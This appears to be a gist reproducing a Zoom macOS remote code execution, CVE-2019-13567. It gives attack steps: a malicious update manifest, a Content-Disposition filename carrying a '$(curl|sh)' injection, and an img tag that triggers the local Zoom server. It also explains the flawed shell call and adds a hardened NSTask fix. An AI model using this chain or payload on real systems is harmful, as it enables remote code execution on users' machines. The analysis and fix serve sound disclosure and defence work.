Last active January 1, 2022 22:33
Zoom RCE - CVE-2019-13567


  1. Create a malicious update manifest with the Package-url pointing to a server you control:
  2. Upload the manifest to a domain; one option is as the icon for a new app (there are client-side checks to see if it's an image, but they can be bypassed):

  3. Use .htaccess (or any other method) to change the filename of the malicious package pointed to by Package-url in the manifest:

Header set Content-Disposition 'attachment; filename="aaaa$(curl|sh).pkg"'

  4. Create a malicious link to hit the local Zoom web server. To bypass the domain checks it must be a valid subdomain for and also end with. This still allows us to create a link to our manifest hosted on http://localhost:19421/launch?

  5. Create an image with the link and host it somewhere:

<img src="http://localhost:19421/launch?">

The RCE is possible because the download URL is built with:

[NSString stringWithFormat:@"https://%@/upgrade?os=mac", domain]

This allows any link to be created; it just needs to be a valid subdomain (the host is checked on the generated URL) and also end with a valid subdomain.

After the manifest is downloaded, the package is downloaded and its signature is checked with:

// filename is taken from the download's Content-Disposition header and interpolated unescaped
NSString *cmd = [NSString stringWithFormat:@"pkgutil --check-signature \"%@\"", filename];
[cmd runAsCommand];

Because the filename is interpolated into a shell command string, this allows trivial command injection via a malicious filename.
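The same check can be done without handing the filename to a shell at all. The following is an added example, not Zoom's code: it runs pkgutil through NSTask with an argument array, so the attacker-controlled filename is a single argv element and shell metacharacters are never interpreted; the downloadDir containment check and the CheckPackageSignature name are assumptions of this example, not something the page describes.

```objc
#import <Foundation/Foundation.h>

// Hardened replacement for the `pkgutil --check-signature "%@"` shell string.
// Returns YES only when pkgutil exits with status 0; `output` receives its stdout
// so the caller can verify the signing identity, not just that a signature exists.
static BOOL CheckPackageSignature(NSString *pkgPath, NSString *downloadDir,
                                  NSString **output) {
    // Defence in depth (assumed policy): refuse any path that escaped the
    // directory the installer was saved into.
    NSString *resolved = [pkgPath stringByStandardizingPath];
    NSString *base = [[downloadDir stringByStandardizingPath] stringByAppendingString:@"/"];
    if (![resolved hasPrefix:base]) {
        return NO;
    }

    NSTask *task = [[NSTask alloc] init];
    task.executableURL = [NSURL fileURLWithPath:@"/usr/sbin/pkgutil"];
    // One argv element per argument: no /bin/sh, so "$(curl|sh)" in the
    // filename is just part of a path string, never a command.
    task.arguments = @[ @"--check-signature", resolved ];

    NSPipe *pipe = [NSPipe pipe];
    task.standardOutput = pipe;
    task.standardError = pipe;

    NSError *err = nil;
    if (![task launchAndReturnError:&err]) {
        return NO;
    }
    // Drain the pipe before waiting, otherwise a chatty child can block on a full pipe.
    NSData *data = [[pipe fileHandleForReading] readDataToEndOfFile];
    [task waitUntilExit];

    if (output) {
        *output = [[NSString alloc] initWithData:data encoding:NSUTF8StringEncoding];
    }
    // Exit status alone only says pkgutil ran; the caller must still parse `output`
    // and compare the reported signer against the expected developer certificate.
    return task.terminationStatus == 0;
}
```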
